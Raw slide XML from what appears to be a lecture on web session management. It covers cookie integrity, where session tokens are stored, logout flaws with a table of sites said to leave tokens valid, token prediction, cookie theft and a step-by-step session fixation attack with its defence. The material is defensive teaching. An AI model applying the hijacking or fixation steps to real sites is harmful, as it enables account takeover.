                <a:t>Set-Cookie:  NAME= </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23571" name="Straight Arrow Connector 27"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="2195514" y="3733800"/>
              <a:ext cx="5119687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2" name="Rectangle 33"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4786312" y="3811588"/>
              <a:ext cx="1524000" cy="37941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value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23573" name="Rectangle 34"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6310312" y="3810000"/>
              <a:ext cx="547688" cy="381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133600" y="4094163"/>
            <a:ext cx="5119688" cy="477837"/>
            <a:chOff x="2209801" y="4551302"/>
            <a:chExt cx="5119687" cy="477898"/>
          </a:xfrm>
        </p:grpSpPr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62201" y="4629099"/>
              <a:ext cx="1955985" cy="369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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="808000"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Cookie:   NAME =</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="23567" name="Straight Arrow Connector 27"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipH="1" flipV="1">
              <a:off x="2209801" y="4551302"/>
              <a:ext cx="5119687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68" name="Rectangle 35"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4495800" y="4649788"/>
              <a:ext cx="1524000" cy="37941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value</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23569" name="Rectangle 36"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6019800" y="4648200"/>
              <a:ext cx="547688" cy="381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475163" y="2514600"/>
            <a:ext cx="3602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Generate tag:   T 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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F(k, value)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23564" name="TextBox 38"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876801" y="4857254"/>
            <a:ext cx="3218638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Verify tag:   T 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= F(k, value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550372C-4AB1-B048-962A-043F48FC4619}" type="slidenum">
              <a:rPr lang="en-GB" sz="1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GB" sz="1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772400" cy="73183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Example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: .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NET 2.0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305800" cy="5092700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450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dirty="0" err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System.Web.Configuration.MachineKey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</a:p>
          <a:p>
            <a:pPr marL="171450" lvl="1" indent="34290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Secret web server key intended for cookie protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="1" indent="34290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Stored on all web servers in site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="1" indent="342900">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft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171450" lvl="1" indent="342900">
              <a:spcBef>
                <a:spcPct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Creating an encrypted cookie with integrity:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450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</a:pP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HttpCookie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 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cookie = new HttpCookie(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name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val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);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HttpCookie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 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encodedCookie =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		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ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HttpSecureCookie.Encode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(cookie);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</a:p>
          <a:p>
            <a:pPr marL="171450">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft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Decrypting and validating an encrypted cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450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</a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ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HttpSecureCookie.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De</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ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code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cs-CZ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(cookie);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00990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Session Management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Sessions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4648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 sequence of requests and responses from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one browser to one (or more) sites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Session can be long     (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Gmail)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	      or short</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="20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without session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mgmt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 users would have to constantly re-authenticate</a:t>
            </a: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Session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mgmt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Authorize user once;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All subsequent requests are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bound to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user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Pre-history:   HTTP auth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36752" r="19173" b="41354"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2651125"/>
            <a:ext cx="7543800" cy="1997075"/>
          </a:xfrm>
          <a:noFill/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04800" y="1219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HTTP request:	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   /index.html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HTTP response contains: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WWW-Authenticate:  Basic realm="Password Required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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endParaRPr lang="en-US" altLang="ja-JP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Browsers sends hashed password on all subsequent HTTP requests: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Authorization:  Basic ZGFddfibzsdfgkjheczI1NXRleHQ=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HTTP auth problems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Hardly used in commercial sites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User cannot log out other than by closing browser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What if user has multiple accounts?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What if multiple users on same computer?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Site cannot customize password dialog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Confusing dialog to users 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Easily spoofed</a:t>
            </a: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Defeated using a TRACE HTTP request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(on old browsers)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Session tokens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81000" y="1447800"/>
            <a:ext cx="1219200" cy="4740275"/>
            <a:chOff x="381000" y="1736725"/>
            <a:chExt cx="1219200" cy="4740275"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323012" name="Rectangle 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="381000" y="2133600"/>
              <a:ext cx="1219200" cy="434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3015" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="457200" y="1736725"/>
              <a:ext cx="96693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itchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Browser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315200" y="1447800"/>
            <a:ext cx="1219200" cy="4724400"/>
            <a:chOff x="7315200" y="1752600"/>
            <a:chExt cx="1219200" cy="4724400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1323013" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7315200" y="2133600"/>
              <a:ext cx="1219200" cy="434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3017" name="Text Box 9"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7348538" y="1752600"/>
              <a:ext cx="1018997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Web Site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600200" y="1784350"/>
            <a:ext cx="5715000" cy="977946"/>
            <a:chOff x="1600200" y="1784132"/>
            <a:chExt cx="5715000" cy="978338"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29715" name="Straight Arrow Connector 39"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600200" y="2133600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6" name="TextBox 40"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="1784132"/>
              <a:ext cx="1916102" cy="40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GET /index.html</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29717" name="Straight Arrow Connector 42"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="2079662" y="2439987"/>
              <a:ext cx="5235538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8" name="TextBox 43"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3811997" y="2362200"/>
              <a:ext cx="3150221" cy="40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set anonymous session token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600200" y="2949575"/>
            <a:ext cx="5105400" cy="707886"/>
            <a:chOff x="1600200" y="2949714"/>
            <a:chExt cx="5105400" cy="707747"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29713" name="Straight Arrow Connector 45"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600200" y="3299182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4" name="TextBox 46"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="2949714"/>
              <a:ext cx="2802370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GET /books.html</a:t>
              </a:r>
            </a:p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anonymous session token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600200" y="3962400"/>
            <a:ext cx="5715000" cy="1088974"/>
            <a:chOff x="1600200" y="3962400"/>
            <a:chExt cx="5715002" cy="1088835"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29709" name="Straight Arrow Connector 47"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600200" y="4311868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0" name="TextBox 48"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2079662" y="3962400"/>
              <a:ext cx="2518639" cy="707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POST /do-login</a:t>
              </a:r>
            </a:p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Username &amp; password</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29711" name="Straight Arrow Connector 49"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="2133601" y="4728963"/>
              <a:ext cx="51816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2" name="TextBox 50"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3048000" y="4651176"/>
              <a:ext cx="3831499" cy="40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elevate to a logged-in session token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600200" y="5387975"/>
            <a:ext cx="5105400" cy="707886"/>
            <a:chOff x="1600200" y="5388114"/>
            <a:chExt cx="5105400" cy="707747"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29707" name="Straight Arrow Connector 51"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1600200" y="5737582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08" name="TextBox 52"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2133600" y="5388114"/>
              <a:ext cx="2601994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POST /checkout</a:t>
              </a:r>
            </a:p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logged-in session token</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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>
            <a:off x="7391400" y="3962400"/>
            <a:ext cx="1490663" cy="10699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check </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>credentials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(later)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7391400" y="5562600"/>
            <a:ext cx="1490663" cy="10699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Validate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9604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Storing session tokens:  </a:t>
            </a:r>
            <a:b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Lots of options  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(but none are perfect)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Browser cookie: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Set-Cookie:   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=fduhye63sfdb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313"/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341313" indent="-341313">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Embedd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in all URL links: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https://site.com/checkout ?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=kh7y3b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313"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341313" indent="-341313"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In a hidden form field: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&lt;input type=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hidden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 	name=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sessionid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 			value=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kh7y3b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&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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341313" indent="-341313">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean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341313" indent="-341313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Window.name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DOM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property</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="615633" lvl="1" indent="-341313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Not good example just mentioned as an option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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="30724" name="Straight Connector 4"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2286000"/>
            <a:ext cx="7772400" cy="1588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5" name="Straight Connector 5"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="3429000"/>
            <a:ext cx="7772400" cy="1587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6" name="Straight Connector 6"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="5105400"/>
            <a:ext cx="7772400" cy="1588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Storing session tokens:   problems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914400"/>
            <a:ext cx="8153400" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="341313" indent="-341313"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Browser cookie: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browser sends cookie with every request,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even when it should not   (CSRF)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313">
              <a:spcBef>
                <a:spcPts val="3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Embed in all URL links:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313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token leaks via HTTP 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Referer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header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313">
              <a:spcBef>
                <a:spcPts val="3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In a hidden form field:     short sessions only	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="341313" indent="-341313"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341313" indent="-341313"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341313" indent="-341313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Best answer:   a combination of all of the above.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="31748" name="Straight Connector 3"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2438400"/>
            <a:ext cx="7772400" cy="1588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9" name="Straight Connector 4"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3733800"/>
            <a:ext cx="7772400" cy="1587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0" name="Straight Connector 5"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="4800600"/>
            <a:ext cx="7772400" cy="1587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The HTTP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Referrer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eader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38608" r="57159" b="56155"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1447800"/>
            <a:ext cx="5281613" cy="838200"/>
          </a:xfrm>
          <a:noFill/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56116" r="42328" b="37067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="169863" y="2352675"/>
            <a:ext cx="8918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381000" y="4262438"/>
            <a:ext cx="583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Referer leaks URL session token to 3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parties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Web Session Management (Cookies)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The Logout Process</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430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838200"/>
            <a:ext cx="7772400" cy="54102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Web sites provide a logout function:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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 Functionality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let user to login as different user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0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 Security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 prevent other from abusing account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What happens during logout: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1.  Delete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from client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2.  Mark session token as expired on server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Problem:   many web sites do (1) but not (2)   !!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="2376"/>
              </a:spcBef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Enables persistent attack on sites that do </a:t>
            </a:r>
            <a:b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login over HTTPS, but use over HTTP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Sites with Improper Logout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63" y="990600"/>
          <a:ext cx="5699125" cy="5013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5217"/>
                <a:gridCol w="3763908"/>
              </a:tblGrid>
              <a:tr h="249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health.google.com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 and edit record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healthvault.com</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="14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 and edit health record</a:t>
                      </a:r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Linkedin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Yahoo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 and sending emails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Hotmail/MSN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Accessing and sending emails</a:t>
                      </a:r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blogger.com</a:t>
                      </a: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Posting a blog post</a:t>
                      </a:r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Ebay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Bidding on an auction</a:t>
                      </a:r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47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Flicker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Uploading photos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wordpress.com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Posting a blog post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IMDB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ask.com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cnn.com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conduit.com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megaupload.com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Uploading files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mediafire.com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Uploading files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4shared.com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Uploading files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cnet.com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weather.com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Editing and saving profile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imageshack.com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Uploading photos</a:t>
                      </a:r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OpenMR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28586" marR="0" marT="18287" marB="182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Accessing,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> changing medical records</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="274304" marR="0" marT="18287" marB="182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Session Hijacking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4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838200" y="3048000"/>
            <a:ext cx="7772400" cy="274478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Attacker waits for user to login;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then attacker obtains user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s Session Token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and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hijacks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 session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1. Predictable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tokens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146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257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Example:     counter   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(Verizon Wireless)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 marL="914400" lvl="1" indent="-457200">
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/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  <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t>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user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logs in, gets counter value, can view sessions of other users</a:t>
            </a:r>
          </a:p>
          <a:p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Example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  weak MAC    (WSJ) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200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token = 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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err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userid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,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err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MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" baseline="-25000" dirty="0" err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k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userid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) }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200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Weak MAC exposes  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k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from few cookies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Apache Tomcat:  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generateSessionID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()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200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MD5(PRG)   …   but weak PRG  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>[GM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1800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sz="1800" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>05].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    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200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Predictable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SessionID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28600" y="4114800"/>
            <a:ext cx="8610600" cy="205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Session tokens must be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unpredicatble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attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1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Use underlying framework.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Rails:     token = MD5( current time, random nonce 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2.   Cookie theft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219200"/>
            <a:ext cx="8153400" cy="5029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Example 1:    login over SSL, but subsequent HTTP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What happens at wireless Café ?   (e.g.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Firesheep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Other reasons why session token sent in the clear:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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HTTPS/HTTP mixed content pages at site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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Man-in-the-middle attacks on SSL </a:t>
            </a:r>
          </a:p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Example 2:    Cross Site Scripting (XSS)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exploits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Amplified by poor logout procedures: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Logout must invalidate token on server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Session fixation attacks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Suppose attacker can set the user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session token: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For URL tokens, trick user into clicking on URL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For cookie tokens, set using XSS exploits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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u="sng" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Attack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   (say, using URL tokens)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod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Attacker gets anonymous session token for site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod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Sends URL to user with attacker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session token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buAutoNum type="arabicPeriod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User clicks on URL and logs into  site.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1314450" lvl="2" indent="-457200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this elevates attacker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token to logged-in token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Tahoma" charset="0"/>
              <a:buAutoNum type="arabicPeriod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Attacker uses elevated token to hijack user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session.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Session fixation:  lesson</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3789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When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elevating user from anonymous to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logged-in, always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issue a new session token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc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Once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user logs in,  token changes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and is unknown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attacker  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      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  <a:sym typeface="Symbol" charset="0"/>
              </a:rPr>
              <a:t> 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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" alt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token is not elevated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc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In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the limit:  assign new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after every request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="35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Revoke session if a replay is detected.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Generating Session Tokens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1447800" y="3352800"/>
            <a:ext cx="64008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Goal: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charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>prevent hijacking and avoid fixation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Option 1:   minimal client-side state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399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219200"/>
            <a:ext cx="8077200" cy="464820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= [random unpredictable string]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no data embedded in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token)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060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Server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stores all data associated to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userid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,  login-status,  login-time,  etc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Can result in server overhead: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When multiple web servers at site, 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   lots of database lookups to retrieve user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Option 2:  lots of client-side state</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409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</a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="160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SID = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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[ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1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userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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,   exp. time,   data]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="160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	where   data = (capabilities, user data, ...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="160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=  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Enc-then-MAC (k,  SID)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US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		 </a:t>
            </a:r>
            <a:r>
